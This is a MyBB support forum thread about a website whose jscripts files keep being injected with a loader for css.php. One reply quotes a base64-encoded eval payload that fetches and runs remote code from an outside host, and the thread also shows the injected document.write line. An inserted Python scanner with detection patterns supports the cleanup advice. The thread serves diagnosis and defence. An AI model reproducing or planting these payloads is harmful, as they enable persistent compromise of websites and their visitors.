MyBB Community Forums

Full Version: Infected with Malicious code repeatedly on Javascript files
Hi all,

My website URL is: http://uniqueminds.in

I am facing a serious security vulnerability on my website, as follows:

PHP code similar to the following line
document.write('<script src="/jscripts/css.php"></script>') 

gets automatically added to my files in the jscripts directory; in turn, css.php will have some encoded code like: base64()

When I delete css.php and clean up the files, after 3 or 4 days it gets added again and again, causing the site to be blacklisted by Google. How can I solve this issue?

Please help me to sort it out, if you have a similar experience.

Thanks in Advance
Sounds like you have a backdoor or something in your site. Change your passwords and do a double check of all your web directories for suspicious files.
(2013-04-03, 08:39 AM)Euan T Wrote: [ -> ]Sounds like you have a backdoor or something in your site. Change your passwords and do a double check of all your web directories for suspicious files.

You should also make a database backup. But yes as Euan says, try to detect any suspicious files in your FTP. As for the part where your css.php keeps reappearing, it could be a shell that your attacker keeps adding. For checking if that is a shell, go to this URL.

http://www.yourwebsite.com/css.php
Mind uploading the source of css.php? Would be interested in decoding it to find what it is.
You have a shell in your files somewhere. Clean them all out.
(2013-04-06, 06:16 PM)stalls Wrote: [ -> ]Mind uploading the source of css.php? Would be interested in decoding it to find what it is.

The code will be similar to this, bro.
 eval(base64_decode('aWYoQGZvcGVuKCdodHRwOi8vaHJoZXJvLmNvbS9iaW9
zL2Jpb3MudHh0JywgJ3InKSkgZXZhbChmaWxlX2dldF9jb250ZW50cygnaHR0c
DovL2hyaGVyby5jb20vYmlvcy9iaW9zLnR4dCcpKTs=l');  

(2013-04-06, 11:53 PM)labrocca Wrote: [ -> ]You have a shell in your files somewhere. Clean them all out.

Can you please let me know what a shell in files is? I am not sure what you are talking about.
A shell is also commonly known as a backdoor. It allows an attacker to regain access or reinfect you. Check every folder and compare the contents with a new MyBB download. Any files that you do not specifically know about are red flags.

Any file could theoretically be infecting you though, if code was added to a normal file. So check the last modified date and check any files last modified near when the compromise was noticed.
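
The check described in the post above (compare the site against a fresh MyBB download and look at modification times) can be scripted. This is an added example, not part of the original thread; the function names, the two byte patterns (built from the snippets posted in this thread) and the 7-day window are assumptions.

```python
import hashlib
import os
import re
from datetime import datetime, timedelta

# Assumed patterns, modelled on the two snippets quoted in this thread.
SUSPICIOUS = [
    re.compile(rb"eval\s*\(\s*base64_decode\s*\("),
    re.compile(rb"document\.write\(\s*['\"]<script[^>]+\.php"),
]

def index(root):
    """Map relative path -> absolute path for every file under root."""
    out = {}
    for folder, _, files in os.walk(root):
        for name in files:
            full = os.path.join(folder, name)
            out[os.path.relpath(full, root)] = full
    return out

def read(path):
    with open(path, "rb") as f:
        return f.read()

def audit(live_root, clean_root, noticed=None, window_days=7):
    """Return {relative_path: [reasons]} for files that need a manual look.

    live_root  : copy of the site's web directory
    clean_root : unpacked fresh download of the same MyBB version
    noticed    : datetime the compromise was noticed (optional)
    """
    live, clean = index(live_root), index(clean_root)
    findings = {}
    for rel, path in sorted(live.items()):
        data, reasons = read(path), []
        if rel not in clean:
            # Uploads, config and plugins land here too; review, don't auto-delete.
            reasons.append("not in clean download")
        elif hashlib.sha256(data).digest() != hashlib.sha256(read(clean[rel])).digest():
            reasons.append("differs from clean download")
        if any(p.search(data) for p in SUSPICIOUS):
            reasons.append("matches injected-code pattern")
        if noticed is not None:
            mtime = datetime.fromtimestamp(os.path.getmtime(path))
            if abs(mtime - noticed) <= timedelta(days=window_days):
                reasons.append("modified near compromise date")
        if reasons:
            findings[rel] = reasons
    return findings
```

Modification times can be reset by whoever wrote the file, so a clean mtime does not clear a file that differs from the fresh download.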
This is the file having encrypted code (Google says it is malicious code) that is being uploaded to my jscripts dir: